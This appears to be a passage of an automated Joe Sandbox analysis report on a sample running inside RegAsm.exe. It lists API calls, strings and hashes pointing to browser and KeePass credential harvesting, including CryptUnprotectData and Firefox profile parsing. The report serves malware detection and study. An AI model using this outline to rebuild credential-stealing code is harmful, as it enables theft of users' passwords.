                            • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                            • String ID:
                            • API String ID: 2014503067-0
                            APIs
                            • GetLastError.KERNEL32 ref: 004182D7
                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                            • LocalFree.KERNEL32(?), ref: 00418342
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                            • String ID: OsError 0x%x (%u)
                            • API String ID: 403622227-2664311388
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 004173BE
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Version
                            • String ID:
                            • API String ID: 1889659487-0
                            APIs
                            • _wcsicmp.MSVCRT ref: 004022A6
                            • _wcsicmp.MSVCRT ref: 004022D7
                            • _wcsicmp.MSVCRT ref: 00402305
                            • _wcsicmp.MSVCRT ref: 00402333
                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                            • memset.MSVCRT ref: 0040265F
                            • memcpy.MSVCRT ref: 0040269B
                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                            • memcpy.MSVCRT ref: 004026FF
                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                            • API String ID: 2257402768-1134094380
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                            • String ID: :stringdata$ftp://$http://$https://
                            • API String ID: 2787044678-1921111777
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                            • GetWindowRect.USER32(?,?), ref: 00414088
                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                            • GetDC.USER32 ref: 004140E3
                            • wcslen.MSVCRT ref: 00414123
                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                            • ReleaseDC.USER32(?,?), ref: 00414181
                            • _snwprintf.MSVCRT ref: 00414244
                            • SetWindowTextW.USER32(?,?), ref: 00414258
                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                            • GetClientRect.USER32(?,?), ref: 004142E1
                            • GetWindowRect.USER32(?,?), ref: 004142EB
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                            • GetClientRect.USER32(?,?), ref: 0041433B
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                            • String ID: %s:$EDIT$STATIC
                            • API String ID: 2080319088-3046471546
                            APIs
                            • EndDialog.USER32(?,?), ref: 00413221
                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                            • memset.MSVCRT ref: 00413292
                            • memset.MSVCRT ref: 004132B4
                            • memset.MSVCRT ref: 004132CD
                            • memset.MSVCRT ref: 004132E1
                            • memset.MSVCRT ref: 004132FB
                            • memset.MSVCRT ref: 00413310
                            • GetCurrentProcess.KERNEL32 ref: 00413318
                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                            • memset.MSVCRT ref: 004133C0
                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                            • memcpy.MSVCRT ref: 004133FC
                            • wcscpy.MSVCRT ref: 0041341F
                            • _snwprintf.MSVCRT ref: 0041348E
                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                            • SetFocus.USER32(00000000), ref: 004134B7
                            Strings
                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                            • {Unknown}, xrefs: 004132A6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                            • API String ID: 4111938811-1819279800
                            APIs
                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                            • SetCursor.USER32(00000000), ref: 0040129E
                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                            • EndDialog.USER32(?,?), ref: 0040135E
                            • DeleteObject.GDI32(?), ref: 0040136A
                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                            • ShowWindow.USER32(00000000), ref: 00401398
                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                            • ShowWindow.USER32(00000000), ref: 004013A7
                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                            • String ID:
                            • API String ID: 829165378-0
                            APIs
                            • memset.MSVCRT ref: 00404172
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • wcscpy.MSVCRT ref: 004041D6
                            • wcscpy.MSVCRT ref: 004041E7
                            • memset.MSVCRT ref: 00404200
                            • memset.MSVCRT ref: 00404215
                            • _snwprintf.MSVCRT ref: 0040422F
                            • wcscpy.MSVCRT ref: 00404242
                            • memset.MSVCRT ref: 0040426E
                            • memset.MSVCRT ref: 004042CD
                            • memset.MSVCRT ref: 004042E2
                            • _snwprintf.MSVCRT ref: 004042FE
                            • wcscpy.MSVCRT ref: 00404311
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                            • API String ID: 2454223109-1580313836
                            APIs
                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                            • SetMenu.USER32(?,00000000), ref: 00411453
                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                            • memcpy.MSVCRT ref: 004115C8
                            • ShowWindow.USER32(?,?), ref: 004115FE
                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                            • API String ID: 4054529287-3175352466
                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintf$memset$wcscpy
                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                            • API String ID: 2000436516-3842416460
                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                            APIs
                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                            • String ID:
                            • API String ID: 1043902810-0
                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                            APIs
                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                            • memset.MSVCRT ref: 0040E380
                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                            • wcschr.MSVCRT ref: 0040E3B8
                            • memcpy.MSVCRT ref: 0040E3EC
                            • memcpy.MSVCRT ref: 0040E407
                            • memcpy.MSVCRT ref: 0040E422
                            • memcpy.MSVCRT ref: 0040E43D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                            • API String ID: 3073804840-2252543386
                            • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                            • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@??3@_snwprintfwcscpy
                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                            • API String ID: 2899246560-1542517562
                            • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                            • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                            • String ID:
                            • API String ID: 3715365532-3916222277
                            • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                            • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                            APIs
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                            • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            • memset.MSVCRT ref: 004085CF
                            • memset.MSVCRT ref: 004085F1
                            • memset.MSVCRT ref: 00408606
                            • strcmp.MSVCRT ref: 00408645
                            • _mbscpy.MSVCRT ref: 004086DB
                            • _mbscpy.MSVCRT ref: 004086FA
                            • memset.MSVCRT ref: 0040870E
                            • strcmp.MSVCRT ref: 0040876B
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                            • CloseHandle.KERNEL32(?), ref: 004087A6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                            • String ID: ---
                            • API String ID: 3437578500-2854292027
                            • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                            • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                            APIs
                            • memset.MSVCRT ref: 0041087D
                            • memset.MSVCRT ref: 00410892
                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                            • GetSysColor.USER32(0000000F), ref: 00410999
                            • DeleteObject.GDI32(?), ref: 004109D0
                            • DeleteObject.GDI32(?), ref: 004109D6
                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                            • String ID:
                            • API String ID: 1010922700-0
                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                            APIs
                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                            • malloc.MSVCRT ref: 004186B7
                            • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                            • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                            • malloc.MSVCRT ref: 004186FE
                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                            • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$FullNamePath$malloc$Version
                            • String ID: |A
                            • API String ID: 4233704886-1717621600
                            • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                            • Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmp
                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                            • API String ID: 2081463915-1959339147
                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                            APIs
                            • GetDC.USER32(00000000), ref: 004121FF
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                            • SelectObject.GDI32(?,?), ref: 00412251
                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                            • SetCursor.USER32(00000000), ref: 004122BC
                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                            • memcpy.MSVCRT ref: 0041234D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                            • String ID:
                            • API String ID: 1700100422-0
                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                            APIs
                            • GetClientRect.USER32(?,?), ref: 004111E0
                            • GetWindowRect.USER32(?,?), ref: 004111F6
                            • GetWindowRect.USER32(?,?), ref: 0041120C
                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                            • GetWindowRect.USER32(00000000), ref: 0041124D
                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
